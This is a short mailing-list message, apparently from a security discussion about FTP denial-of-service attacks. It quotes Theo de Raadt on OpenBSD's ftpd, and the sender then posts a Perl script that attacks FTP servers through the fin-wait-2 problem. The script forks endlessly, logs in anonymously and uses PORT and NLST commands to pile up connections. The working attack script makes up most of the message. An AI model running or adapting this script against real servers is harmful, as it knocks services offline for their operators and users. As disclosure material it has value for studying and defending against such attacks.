In some mail from Theo de Raadt, sie said:
[...]
> The OpenBSD ftpd has never permitted more than 1 connection at a time
> in PASV mode, thus this particular denial of service attack does not
> work.
Excellent.
> I caused myself some difficulties by accidentally starting up 400 perl
> instances, though..
There's no helping pilot error ;)
Below is an attached perl script which attacks based on the fin-wait-2
`problem'.
Darren
#!/usr/bin/perl
$DOS_HOST="localhost";
use IO::Socket;
$pid = $$;
$num = 0;
while (1) {
while (fork) {
$sock = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $DOS_HOST,
PeerPort => "ftp(21)",
);
last if (!$sock);
$me = getsockname($sock);
($mport, $mip) = unpack_sockaddr_in($me);
if (!$sock) {
print "connect failed!\n";
waitpid -1,0;
}
$sock->autoflush(1);
while (<$sock>) {
print;
print $sock "USER anonymous\r\n" if (/^220 .*/);
print $sock "PASS root@\r\n" if (/^331 .*/);
if (/^150 .*/) {
$conn[$num++] = $x->accept();
} elsif (/^200 .*/) {
print $sock "NLST\r\n";
} elsif (/^230 .*/ || /^226 .*/) {
$x = IO::Socket::INET->new(
Proto => "tcp",
LocalAddr => inet_ntoa($mip),
Listen => 1,
);
last if (!$x);
$lsock[$num] = $x;
$local = getsockname($x);
($lport, $lip) = unpack_sockaddr_in($local);
($sip = inet_ntoa($mip)) =~ s/\./,/g;
$lp[0] = $lport >> 8;
$lp[1] = $lport & 0xff;
print $sock "PORT $sip,$lp[1]\r\n";
}
last if (/^530 .*/);
}
waitpid -1,0;
}
sleep(5);
}